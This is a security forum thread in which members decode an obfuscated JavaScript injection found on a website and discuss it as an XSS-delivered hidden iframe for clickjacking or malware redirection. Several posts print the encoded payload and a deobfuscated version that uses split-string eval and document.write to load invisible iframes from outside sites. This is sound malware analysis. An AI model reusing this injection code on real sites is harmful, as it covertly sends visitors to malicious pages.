Decode Urgent Help Needed

Viewing 16 reply threads
  • Author
    Posts
    • #4068
      Dark_Knight
      Participant

      I need some help here. Anybody have and idea what this does?
      336425333425333725333025323025373325373425373925366325363525336425323725373625363925373325 3639253632253639253663253639253734253739253361’+c26z3d+’25363825363925363425363425 3635253665253237253365253363253266253639253636253732253631’+c26z3d+’25366425363525 33652729293B7D7661’+c26z3d+’72206D796961’+c26z3d+’3D747275653B3C2F736372 6970743E’;r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

      How could I decode this?

    • #25850
      alan
      Participant

      how far have you gotten?

      putting this portion into

      3D747275653B3C2F7363726970743E

      hex 2 ascii gives

      =true;

      which looks reasonable! but i get stuck there!

    • #25851
      Dark_Knight
      Participant

      I initially tried the hex to ascii but had n luck. I will give it another shot.

    • #25852
      alan
      Participant

      i think you could be missing a good portion of it, i’ve sent you a private message which may or may not be relavent

    • #25853
      Jhaddix
      Participant

      by first impressions id say its an XSS attack… a full decode would be required.

    • #25854
      Dark_Knight
      Participant

      Thanks for all the help guys. I appreciate it.

    • #25855
      Ketchup
      Participant

      The rough translation is this:

      style='visibility:hidden'>'));}var myia=true; r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

      You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.

    • #25856
      UNIX
      Participant

      I too would say, that a part is missing. Do you have the rest of it or were you just asking to get an idea what this could be?

    • #25857
      Jhaddix
      Participant

      ketchup’s decode makes me think its a clickjacking attack, injected via xss.

    • #25858
      Dark_Knight
      Participant

      c26z634=”;r28bd46b6=document;r28bd46b6.write(‘function r4373bbe(r52973acb7a){return ev’+c26z634+’al(r52973acb7a); }’);  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4=”;return (r4373bbe(‘parseI’+zf4+’nt’)(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7=”;r17e8d5766=’fromCh’;r26431=String[r17e8d5766+’arCode’];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756 E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c 26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634 +'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631&#039 ;+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634 +'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631&#039 ;+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'25333025333925333925333 025333825323925326225323725333025363525333925333225333525363225323725323025373725363925363425373425363825336425333625333325333925 3230253638253635253639253637253638253734253364253331'+c26z634+'25333725333225323025373325373425373925366325363525336425 3237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'25363825363925363425363425363525366525 3237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796 961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));check_content()

      if(!myia){document.write(unescape
           
      =true;
      ));}va

      thats what I have so far. Apparently they go from Hex 2 asscii and then ascii to binary

    • #25859
      Ketchup
      Participant

      Well, they are obscuring the code a bit.  It’s pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.  The attack vector looks like a hidden IFRAME.



      spacer='';
      doc=document;
      doc.write('function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }');


      function function1(func1_arg1)
      {

        function setvar1()
        {
          var var1=16;
          return var1;
        }
        var spacer2='';
        return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
      }

      function function2(func2_arg1)
      {
        function setvar2()
        {
          var var2=2;
          return var2;
        }
        var return_string='';
        string1='fromCh';
        string2=String[string1+'arCode'];
        for(i=0;i<func2_arg1.length;i+=setvar2())
        {
          return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
        }
        return return_string;
      }

      var attack_vector='3C7363726970743E69662821' +spacer+ '6D796961' +spacer+ '297B646F63756D656E742E777269746528756E65736361' +spacer+ '7065282027253363253639253636253732253631' +spacer+ '253664253635253230253665253631' +spacer+ '253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361' +spacer+ '253266253266253737253737253737253265253631' +spacer+ '253732253665253638253635253664253264253634253639253631' +spacer+ '253664253631' +spacer+ '253665253734253265253665253663253266253366253237253262253464253631' +spacer+ '253734253638253265253732253666253735253665253634253238253464253631' +spacer+ '253734253638253265253732253631' +spacer+ '253665253634253666253664253238253239253261' +spacer+ '253331' +spacer+ '253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331' +spacer+ '253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361' +spacer+ '253638253639253634253634253635253665253237253365253363253266253639253636253732253631' +spacer+ '2536642536352533652729293B7D7661' +spacer+ '72206D796961' +spacer+ '3D747275653B3C2F7363726970743E';




      if(!myia)
      {
        document.write(unescape( "''"));
      }
      var myia=true;






      document.write(function2(attack_vector));




        check_content()
    • #25860
      Dark_Knight
      Participant

      Guys the help is GREATLY appreciated. So this looks like a XSS attack maybe as mentioned previously?

    • #25861
      Ketchup
      Participant

      Yep, I am not sure exactly what that link is doing, but I am not brave to find out 🙂

    • #25862
      Ketchup
      Participant

      Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable. 

      This is interesting.  I will let you know if I find anything else.



      var filler1 = "lRusrktXDJJYrvSgerej";
      var filler2 = "OsFFoXlSOQCXadLJskRb";
      var filler3 = "jEfJhqTablBNAwUHCnrO";

      var shellcode? = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99 z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34 z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z5 8z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z 112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z1 08z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z1 14z97z109z101z62";

      var filler4 = "mgpmcKufxlumukVYGnvu";
      var filler5 = "FyzziVYoJTjQuBufAdRA";
      var filler6 = "cUHXVBCVfUWXBJKmVWmB";

      var array_var1 = shellcode?.split("z");

      var filler7 = "EMwGVHsrdesOdfMoCHhk";
      var filler8 = "sQVVvhKypribJcOSEVUP";
      var filler9 = "gaVqDjIHFcWYXCCoEMiV";

      var string_var1 = "";

      var filler10 = "GmndopStCBOxlsqrCdDA";
      var filler11 = "jWjVPaMREQRNXxbGzyyf";
      var filler12 = "zAvXyXdyVbdHfvSeerMv";

      for (var i=1; i<array_var1.length; i++)
      {
        string_var1+=String.fromCharCode(array_var1);
      }
      try
      {
        document.write(string_var1);
      }
      catch(e)
      {
      }

      var filler13 = "cEtIzLmeDzZbgWDQoxfq";
      var filler14 = "nQFUmJkbGQRhsImNXTyo";
      var filler15 = "fosYxelUyjIaDpPnYRyu";





      check_content()
    • #25863
      Ketchup
      Participant

      LOL, that’s not shellcode.  I was over-analyzing it.   It’s just another iframe:

      I traced it through a couple of more sites, and I am stuck here:

      The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.  It doesn’t appear to translate to anything readable, at least not in English.

    • #25864
      Jhaddix
      Participant

      i saw hashing like that used to back scan for successfully compromised hosts (i think) from a presentation from Valsmith.

      Lifecycle is:

      1) use an automated tool to scan the net for potentially vulnerable sites

      2) tool attempts to inject iframes via xss or sqli to all targets. purpose? to clickjack to a referrer site that pays for clicks, or iframe is used to redirect to hosted site to deploy more malware and harvest bots.

      3) same automated tool scans pages for hash values to see which targets the attacks worked on.

      profit…

    • #25865
      Ketchup
      Participant

      JHaddix,

      It’s possible that the last page is some sort of confirmation / logging page.  What’s interesting though, is that a couple of the IFRAME jumps pass no parameters at all.  I wasn’t tracking cookies as I was going through the code, so it’s quite possible that the compromised host information is in a cookie.

      It could be that if the hash value is incorrect, the page displays an error message encoded in BASE64.  Again, though, I can’t seem to translate it to English.  I am posting an example below.  This is an indeed very interesting.

      I doubt that we will know exactly what’s going unless we get access to the PHP code of the final jump.  Interestingly enough, this potentially last jump is on a box hosted in the US, while the others are elsewhere in the world. 

      http://samspade.org/whois/ddosguard.info

      One of the BASE64 messages from the last jump point
      :

      0xKAJ/ZbK0/nO2UabGOYZKFPE9WFocXlMEVwUW/jO/rR93gNZPnsqTcPyOVDiEt07gmqHYtSpc1BRoYPqRddPOTVrnYsPI3ObwRLscAXCf+vEwFgg0na7NaW+3z fEHlD13VTvU9mx3dXjzSzDU4fbRs26rsJ3XHGMXILscxUvYIxDCapRvthq47f/H/OMs7sTQt2DCKq9IphIGsCMu6M+eER4wRpDk7javZRRO97U68kENX2VBsUJwP/KItQ vx7nbkuV9N2PKPvzUUyVZhLiPpnecTXQjLVCwli/HnoQ6krif+BYRfbY4lDsFPswLea6AfjpW33BET4idzNWquGmbzE2ylCSN8pvHOobXaImpCamtyAuqAUNaLqaLMor2 0JPa+K39yHmcVEme4MpE0ThSUpzFvnm4xjL8XCqeA32q357rLnMEuZ6tedZgjRfnH8zoB0H15ZOOgiRAHGVDDubR8XCvF2VSECT+4J+Iqj6HPJjYO0wJKiqo3eXBR+TcT qw1v0po6G+zgGC4L1VZoyA0308qr1Rx0bgLS/LIjX4j3MmNTOrubKJDInGh9eZImMTL7R3ZMU3/P5r3f2itRkfep0LkdwqgqMztkWgbP0i7GF7ZHpvjo57bIMdd2j/iwN Jw56DiP3f8H9W+gXu7njHc3KyY4BqA4gz5B1aEw0HiP3aGIK4VSPYHULvrPkHXjWuZtclDLX52sJ6aMxZN2l1czKh+t4sallKAtSk8Gj7r+1IEqBcQnFT8dCipyKFaj+w 3XCpWVWtPKkviMSRP80+MAUsqeaGyNIZ6xkR7OWusRquK9NK7x5rMF0JGQ==
Viewing 16 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?